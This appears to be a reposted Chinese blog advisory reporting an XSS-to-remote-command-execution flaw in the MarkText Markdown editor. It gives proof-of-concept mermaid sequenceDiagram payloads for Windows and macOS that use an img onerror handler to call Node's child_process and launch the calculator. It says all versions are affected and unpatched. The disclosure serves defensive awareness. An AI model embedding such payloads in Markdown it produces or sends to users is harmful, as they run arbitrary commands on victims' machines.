其他分享
首页 > 其他分享> > marktext编辑器XSS触发RCE命令执行

marktext编辑器XSS触发RCE命令执行

作者:互联网

marktext编辑器XSS触发RCE命令执行

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

marktext编辑器XSS触发RCE命令执行

风险等级

高危

影响版本

marktext目前所有版本均受影响

资产确定

https://marktext.app/

漏洞验证

windows

```mermaid
sequenceDiagram
 B ->> S: <img src=1 one rror="require('child_process').execSync('c:\\windows\\system32\\calc.exe')">
 hello ->> B:

mac

```mermaid
sequenceDiagram
 B ->> S: <img src=1 one rror="require('child_process').exec('open /System/Applications/Calculator.app')">
 hello ->> B:

修复方案

目前尚未修复

标签:XSS,触发,编辑器,sequenceDiagram,RCE,marktext
来源: https://blog.csdn.net/qq_46717339/article/details/122731419